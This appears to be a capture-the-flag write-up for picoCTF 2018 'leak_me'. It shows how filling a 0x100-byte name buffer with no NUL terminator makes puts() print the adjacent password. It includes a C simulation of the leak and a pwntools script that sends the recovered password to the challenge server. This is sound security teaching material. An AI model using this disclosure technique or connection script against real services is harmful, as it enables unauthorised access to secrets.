picoctf_2018_leak_me
Steps
- Routine checks: 32-bit binary, NX is enabled
- Run it locally to get a feel for the program flow
Loading the 32-bit binary in IDA shows the rough flow: the program first reads a name, then reads a password. There should be a password.txt on the target machine against which the input is compared; if the input matches, the flag function is called, and the flag function prints the flag.
- The name buffer v5 and the password buffer s sit close together on the stack, and the data read into v5 runs right up to s. The distance between them is 0x154 - 0x54 = 0x100, and the read into v5 accepts exactly 0x100 bytes, so the input fills v5 completely and leaves no terminating NUL before s. Line 34 of main (as numbered in the decompilation) then prints v5 with puts, and puts stops only at the first '\x00'. At that point v5 holds 0x100 * 'a' followed directly by the password and then '\x00' * 0x4c, so the password is printed out together with the filler.
Here I use cyclic to generate the 0x100-byte string and read the password out of the leaked output, which gives the password a_reAllY_s3cuRe_p4s$word_f85406
- Next, reconnect with nc and enter the password
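As an added example (not code from the write-up or the challenge binary), the following C program models the leak described above: two adjacent buffers, the name buffer filled with exactly its size in non-NUL bytes, and a puts()-style scan that runs until the first NUL and therefore continues into the password buffer. It also shows the failure mode: fill one byte short and the NUL inside the name buffer stops the print, so nothing leaks. The 0x100 offset and the password value are taken from the write-up; the struct layout, the 0x40 size of s, and the function names are assumptions standing in for the real stack frame.

```c
/* Added example: local model of the leak_me name/password leak.
 * The struct stands in for the stack frame: name (v5) sits 0x100 bytes
 * before password (s), exactly as the write-up's 0x154 - 0x54 computes. */
#include <stdio.h>
#include <string.h>

#define NAME_LEN 0x100   /* size of the read into v5, from the write-up */
#define PASS_LEN 0x40    /* assumed size of s; only needs to hold the password */

struct frame {
    char name[NAME_LEN];      /* v5 in the decompilation: user input lands here */
    char password[PASS_LEN];  /* s in the decompilation: read from password.txt */
};

/* Model of the vulnerable read: up to NAME_LEN bytes are copied in and no
 * terminator is added beyond what the input itself carries. */
static void read_name(struct frame *f, const char *input, size_t len)
{
    memset(f->name, 0, sizeof f->name);
    if (len > NAME_LEN)
        len = NAME_LEN;
    memcpy(f->name, input, len);
}

/* What puts(name) really emits: every byte up to the first NUL, wherever it
 * is. Scanning from the start of the whole struct models the stack walk. */
static size_t printed_len(const struct frame *f)
{
    return strlen((const char *)f);
}

/* Recover the password from the leaked line: whatever follows the filler.
 * Returns NULL when a NUL inside the name buffer stopped the print early. */
static const char *leaked_password(const struct frame *f, size_t filler_len)
{
    if (printed_len(f) <= filler_len)
        return NULL;
    return (const char *)f + filler_len;
}

/* Set the frame up the way the target does (password already in s), send
 * filler_len bytes of 'a' as the name, and return what the leak yields. */
static const char *simulate(struct frame *f, size_t filler_len)
{
    static char filler[NAME_LEN];
    memset(filler, 'a', sizeof filler);
    memset(f, 0, sizeof *f);
    /* password value from the write-up; constructed test data here */
    strcpy(f->password, "a_reAllY_s3cuRe_p4s$word_f85406");
    read_name(f, filler, filler_len);
    return leaked_password(f, filler_len);
}

int main(void)
{
    struct frame f;
    const char *pw;

    /* Exact fill of v5: no NUL before s, puts runs into the password. */
    pw = simulate(&f, NAME_LEN);
    printf("filled 0x%zx bytes, puts() would print %zu bytes\n",
           (size_t)NAME_LEN, printed_len(&f));
    printf("leaked: %s\n", pw ? pw : "(no leak)");

    /* One byte short: the NUL at name[0xff] stops puts, nothing leaks. */
    pw = simulate(&f, NAME_LEN - 1);
    printf("filled 0x%zx bytes, puts() would print %zu bytes -> %s\n",
           (size_t)(NAME_LEN - 1), printed_len(&f), pw ? pw : "(no leak)");
    return 0;
}
```

The same check is worth doing on the real target before trusting an offset: if the leaked line is no longer than the filler you sent, either the buffers are not adjacent or a terminator landed between them.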
You don't need to write an exp for this challenge at all, but let's write one anyway.
from pwn import *

# Password recovered by hand from the leak step above
password = b"a_reAllY_s3cuRe_p4s$word_f85406"

p = remote("node3.buuoj.cn", 28171)
# The name does not matter here; the leak was already done on a previous connection
p.sendlineafter(b"What is your name?\n", b"A")
p.sendlineafter(b"Please Enter the Password.\n", password)
p.interactive()